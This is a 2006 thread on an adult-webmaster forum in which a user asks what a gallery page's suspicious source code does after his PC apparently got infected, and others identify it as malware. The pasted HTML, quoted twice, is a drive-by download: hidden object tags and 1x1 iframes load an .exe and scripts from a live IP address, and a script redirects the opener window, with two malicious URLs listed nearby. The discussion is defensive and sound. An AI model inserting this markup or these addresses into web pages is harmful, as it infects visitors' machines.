GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Does anybody have a test machine to see what this code does? (https://gfy.com/showthread.php?t=562795)

Dirty F 01-12-2006 09:09 AM
Does anybody have a test machine to see what this code does?
 
I checked a gallery and the sec i clicked it my puter started going crazy. It started loading something it seems and took mins before it was back to normal.
I checked the source of the gallery and notice some odd stuff...

This is the url. DO NOT CLICK IT!
h ttp://195.225.177.38/mind/r001/

And inside i found stuff like:

Code:
<object data="http://195.225.177.38/rnrdnew/str.exe" type="text/x-scriptlet" STYLE=display:none> 
</object> 
<object data="http://195.225.177.38/rnrdnew/strsp2.js" type="text/x-scriptlet" STYLE=display:none> 
</object> 
<iframe src="http://195.225.177.38/rnrdnew/index.html" width=1 height=1 style="display:none"></iframe>

<SCRIPT language=JavaScript type=text/JavaScript>
<!--

      if (parent.window.opener) parent.window.opener.location='http://195.225.177.38/tds/in.cgi?nine';
    //-->
    </SCRIPT>

<iframe src="http://195.225.177.38/mind/st/index.htm" width="1" height="1"></iframe>
Anybody know what all this crap is? I see no signs of infection yet but i think im hit with something.

Also this opened in a new window: ONE AGAIN DO NOT CLICK unless you're on a test machine.

h ttp://82.179.166.2/default.php?id=83556&c=cHw1J1sN3Jy70Z9v8JLN1D4XJNc RA1u7

Dirty F 01-12-2006 09:11 AM
The whois goes to a Ukranian address. What a surprise.
I see shady shit and Russians are involved. Who wouldve guessed that.

AlienQ - BANNED FOR LIFE 01-12-2006 09:14 AM
Quote:
Originally Posted by Franck
The whois goes to a Ukranian address. What a surprise.
I see shady shit and Russians are involved. Who wouldve guessed that.
What more is there to know?
Someones PC is forever changed and tainted.

Shoot your Hard Drive.

fris 01-12-2006 09:17 AM
it has an .exe in the object address that shold tell you something.

AlienQ - BANNED FOR LIFE 01-12-2006 09:19 AM
http://vil.mcafeesecurity.com/vil/content/v_135733.htm

AlienQ - BANNED FOR LIFE 01-12-2006 09:21 AM
Basically McAffey says you are fucked.

KingK7 01-12-2006 09:22 AM
It will make you convert in 1:7000 with ccbill

AlienQ - BANNED FOR LIFE 01-12-2006 09:23 AM
Quote:
Originally Posted by KingK7
It will make you convert in 1:7000 with ccbill

LOL :thumbsup

Ya think it is a AFF Code swapper? Could be...

chupachups 01-12-2006 09:43 AM
I know what nasty shit this it..... Summary: Pay or format your HD :(

GFX Wiz 01-12-2006 09:45 AM
Quote:
Originally Posted by Franck
I checked a gallery and the sec i clicked it my puter started going crazy. It started loading something it seems and took mins before it was back to normal.
I checked the source of the gallery and notice some odd stuff...

This is the url. DO NOT CLICK IT!
h ttp://195.225.177.38/mind/r001/

And inside i found stuff like:

Code:
<object data="http://195.225.177.38/rnrdnew/str.exe" type="text/x-scriptlet" STYLE=display:none> 
</object> 
<object data="http://195.225.177.38/rnrdnew/strsp2.js" type="text/x-scriptlet" STYLE=display:none> 
</object> 
<iframe src="http://195.225.177.38/rnrdnew/index.html" width=1 height=1 style="display:none"></iframe>

<SCRIPT language=JavaScript type=text/JavaScript>
<!--

      if (parent.window.opener) parent.window.opener.location='http://195.225.177.38/tds/in.cgi?nine';
    //-->
    </SCRIPT>

<iframe src="http://195.225.177.38/mind/st/index.htm" width="1" height="1"></iframe>
Anybody know what all this crap is? I see no signs of infection yet but i think im hit with something.

Also this opened in a new window: ONE AGAIN DO NOT CLICK unless you're on a test machine.

h ttp://82.179.166.2/default.php?id=83556&c=cHw1J1sN3Jy70Z9v8JLN1D4XJNc RA1u7
Thanks Franck...we're always looking for shit like this for our test machines. If anyone else has any more, please post or email to [email protected]

Dirty F 01-12-2006 09:47 AM
Quote:
Originally Posted by chupachups
I know what nasty shit this it..... Summary: Pay or format your HD :(

I cant find any sings of infection. I wonder if it failed to install.

Dirty F 01-12-2006 09:48 AM
Quote:
Originally Posted by GFX Wiz
Thanks Franck...we're always looking for shit like this for our test machines. If anyone else has any more, please post or email to [email protected]

Yw...what exactly you do with it?

GFX Wiz 01-12-2006 09:51 AM
Quote:
Originally Posted by Franck
Yw...what exactly you do with it?
Harvest spyware definitions for our anti-spyware application

Dirty F 01-12-2006 09:52 AM
Quote:
Originally Posted by GFX Wiz
Harvest spyware definitions for our anti-spyware application

i see...cool.

chupachups 01-12-2006 09:56 AM
Franck, do you see any disturbing effects of it? Did it change your wallpaper, and you cant change it back etc?

Dirty F 01-12-2006 09:59 AM
Quote:
Originally Posted by chupachups
Franck, do you see any disturbing effects of it? Did it change your wallpaper, and you cant change it back etc?

Nothing so far. I checked the windows dirs. No new files, no changes. Virus scanner didnt pick up anything so far...but who knows after a reboot.

I used FF...maybe that stopped the infection partly.


All times are GMT -7. The time now is 02:30 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2026, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123